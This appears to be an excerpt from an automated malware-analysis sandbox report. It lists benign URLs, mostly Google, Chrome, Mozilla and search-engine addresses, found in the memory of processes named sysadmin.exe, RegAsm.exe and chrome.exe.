            Source: chrome.exe, 00000005.00000003.1856921212.00006A4000F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859814307.00006A4001150000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1856815221.00006A4001040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1858821366.00006A4000F64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1858508013.00006A4000EE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1858570195.00006A40007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1856659366.00006A4000EEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859506476.00006A40010E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859095154.00006A40003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1857052776.00006A400100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1856779226.00006A4000FE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859371665.00006A4000E0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
            Source: chrome.exe, 00000005.00000003.1856921212.00006A4000F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859814307.00006A4001150000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1856815221.00006A4001040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1858821366.00006A4000F64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1858508013.00006A4000EE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1858570195.00006A40007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1856659366.00006A4000EEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859506476.00006A40010E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859095154.00006A40003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1857052776.00006A400100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1856779226.00006A4000FE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859371665.00006A4000E0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
            Source: chrome.exe, 00000005.00000003.1856921212.00006A4000F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859814307.00006A4001150000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1856815221.00006A4001040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1858821366.00006A4000F64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1858508013.00006A4000EE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1858570195.00006A40007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1856659366.00006A4000EEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859506476.00006A40010E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859095154.00006A40003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1857052776.00006A400100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1856779226.00006A4000FE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859371665.00006A4000E0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
            Source: sysadmin.exe, 00000000.00000002.1727704147.000001A6BFDE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: chromecache_80.8.drString found in binary or memory: http://www.broofa.com
            Source: sysadmin.exeString found in binary or memory: http://www.newtonsoft.com/jsonschema
            Source: RegAsm.exe, 00000004.00000002.2324726568.0000000003B67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: chrome.exe, 00000005.00000003.1861881556.00006A4000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
            Source: chrome.exe, 00000005.00000003.1861881556.00006A4000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
            Source: chrome.exe, 00000005.00000003.1861881556.00006A4000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
            Source: chromecache_83.8.drString found in binary or memory: https://accounts.google.com/o/oauth2/auth
            Source: chromecache_83.8.drString found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
            Source: chrome.exe, 00000005.00000003.1876257197.00006A400140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
            Source: chrome.exe, 00000005.00000003.1869844586.00006A400128C000.00000004.00000800.00020000.00000000.sdmp, chromecache_80.8.dr, chromecache_83.8.drString found in binary or memory: https://apis.google.com
            Source: RegAsm.exe, 00000004.00000002.2328014829.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2326300470.0000000003C20000.00000004.00000020.00020000.00000000.sdmp, 16fct0.4.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
            Source: RegAsm.exe, 00000004.00000002.2328014829.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2326300470.0000000003C20000.00000004.00000020.00020000.00000000.sdmp, 16fct0.4.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
            Source: RegAsm.exe, 00000004.00000002.2324726568.0000000003B67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: RegAsm.exe, 00000004.00000002.2324726568.0000000003B67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: RegAsm.exe, 00000004.00000002.2324726568.0000000003B67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: chrome.exe, 00000005.00000003.1859669568.00006A4000CB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
            Source: chrome.exe, 00000005.00000003.1870839101.00006A4000BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1874714215.00006A4000BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1876049359.00006A4000BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: chrome.exe, 00000005.00000003.1852507283.00006A4000CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1851416848.00006A4000CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1858659616.00006A4000C98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1852915521.00006A4000CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1851938788.00006A4000C98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1851383466.00006A4000C98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859669568.00006A4000CB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
            Source: chrome.exe, 00000005.00000003.1877979481.00002E980080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1830078691.00002E9800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1876257197.00006A400140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
            Source: chrome.exe, 00000005.00000003.1877979481.00002E980080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1830078691.00002E9800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1876257197.00006A400140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
            Source: chrome.exe, 00000005.00000003.1830540703.00002E9800684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1878955833.00006A400152C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1878929698.00006A4001528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
            Source: chrome.exe, 00000005.00000003.1877979481.00002E980080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1830078691.00002E9800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1876257197.00006A400140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
            Source: chrome.exe, 00000005.00000003.1826504206.000012E0002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1826527780.000012E0002E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
            Source: chrome.exe, 00000005.00000003.1836832928.00006A4000490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
            Source: chromecache_83.8.drString found in binary or memory: https://clients6.google.com
            Source: chromecache_83.8.drString found in binary or memory: https://content.googleapis.com
            Source: RegAsm.exe, 00000004.00000002.2328014829.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2326300470.0000000003C20000.00000004.00000020.00020000.00000000.sdmp, 16fct0.4.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
            Source: RegAsm.exe, 00000004.00000002.2328014829.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2326300470.0000000003C20000.00000004.00000020.00020000.00000000.sdmp, 16fct0.4.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
            Source: chrome.exe, 00000005.00000003.1836832928.00006A4000490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
            Source: chrome.exe, 00000005.00000003.1876257197.00006A400140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
            Source: chromecache_83.8.drString found in binary or memory: https://domains.google.com/suggest/flow
            Source: chrome.exe, 00000005.00000003.1836832928.00006A4000490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-autopush.corp.google.com/
            Source: chrome.exe, 00000005.00000003.1836832928.00006A4000490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-0.corp.google.com/
            Source: chrome.exe, 00000005.00000003.1836832928.00006A4000490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-1.corp.google.com/
            Source: chrome.exe, 00000005.00000003.1836832928.00006A4000490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-2.corp.google.com/
            Source: chrome.exe, 00000005.00000003.1836832928.00006A4000490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.google.com/
            Source: chrome.exe, 00000005.00000003.1836832928.00006A4000490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-4.corp.google.com/
            Source: chrome.exe, 00000005.00000003.1836832928.00006A4000490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-5.corp.google.com/
            Source: chrome.exe, 00000005.00000003.1836832928.00006A4000490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-6.corp.google.com/
            Source: chrome.exe, 00000005.00000003.1836832928.00006A4000490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-preprod.corp.google.com/
            Source: chrome.exe, 00000005.00000003.1836832928.00006A4000490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-staging.corp.google.com/
            Source: chrome.exe, 00000005.00000003.1859095154.00006A40003A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
            Source: chrome.exe, 00000005.00000003.1836832928.00006A4000490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: RegAsm.exe, 00000004.00000002.2324726568.0000000003B67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: RegAsm.exe, 00000004.00000002.2324726568.0000000003B67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: RegAsm.exe, 00000004.00000002.2324726568.0000000003B67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: chromecache_80.8.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
            Source: chromecache_80.8.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
            Source: chromecache_80.8.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
            Source: chromecache_80.8.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
            Source: chrome.exe, 00000005.00000003.1878929698.00006A4001528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
            Source: chrome.exe, 00000005.00000003.1878955833.00006A400152C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1878929698.00006A4001528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/#m
            Source: chrome.exe, 00000005.00000003.1878955833.00006A400152C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1878929698.00006A4001528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/%l
            Source: chrome.exe, 00000005.00000003.1878955833.00006A400152C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1878929698.00006A4001528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/(l
            Source: chrome.exe, 00000005.00000003.1878955833.00006A400152C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1878929698.00006A4001528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/-m
            Source: chrome.exe, 00000005.00000003.1878955833.00006A400152C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1878929698.00006A4001528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com//l
            Source: chrome.exe, 00000005.00000003.1878955833.00006A400152C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1878929698.00006A4001528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/0i
            Source: chrome.exe, 00000005.00000003.1877979481.00002E980080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1830078691.00002E9800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1876257197.00006A400140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
            Source: chrome.exe, 00000005.00000003.1878955833.00006A400152C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1878929698.00006A4001528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2l
            Source: chrome.exe, 00000005.00000003.1878955833.00006A400152C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1878929698.00006A4001528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/4m
            Source: chrome.exe, 00000005.00000003.1878955833.00006A400152C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1878929698.00006A4001528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/7m
            Source: chrome.exe, 00000005.00000003.1878955833.00006A400152C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1878929698.00006A4001528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/9l
            Source: chrome.exe, 00000005.00000003.1830540703.00002E9800684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/hj
            Source: chrome.exe, 00000005.00000003.1878955833.00006A400152C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1878929698.00006A4001528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/l
            Source: chrome.exe, 00000005.00000003.1830540703.00002E9800684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1878955833.00006A400152C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1878929698.00006A4001528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
            Source: chrome.exe, 00000005.00000003.1877979481.00002E980080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1830078691.00002E9800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1876257197.00006A400140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
            Source: chrome.exe, 00000005.00000003.1830540703.00002E9800684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
            Source: chrome.exe, 00000005.00000003.1830540703.00002E9800684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
            Source: chrome.exe, 00000005.00000003.1880520387.00006A40016AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1880574158.00006A40016BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
            Source: chrome.exe, 00000005.00000003.1876257197.00006A400140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
            Source: chrome.exe, 00000005.00000003.1876257197.00006A400140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
            Source: chrome.exe, 00000005.00000003.1876257197.00006A400140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
            Source: 16fct0.4.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
            Source: chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
            Source: chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
            Source: chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
            Source: chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
            Source: chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
            Source: chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
            Source: chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
            Source: chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
            Source: chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
            Source: chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
            Source: chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
            Source: chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
            Source: chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
            Source: chrome.exe, 00000005.00000003.1830078691.00002E9800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
            Source: chrome.exe, 00000005.00000003.1876699858.00006A4001970000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1876675408.00006A400196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1876766629.00006A4001974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1876644809.00006A400195C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
            Source: chrome.exe, 00000005.00000003.1877979481.00002E980080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1830078691.00002E9800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
            Source: chrome.exe, 00000005.00000003.1877979481.00002E980080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1830078691.00002E9800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
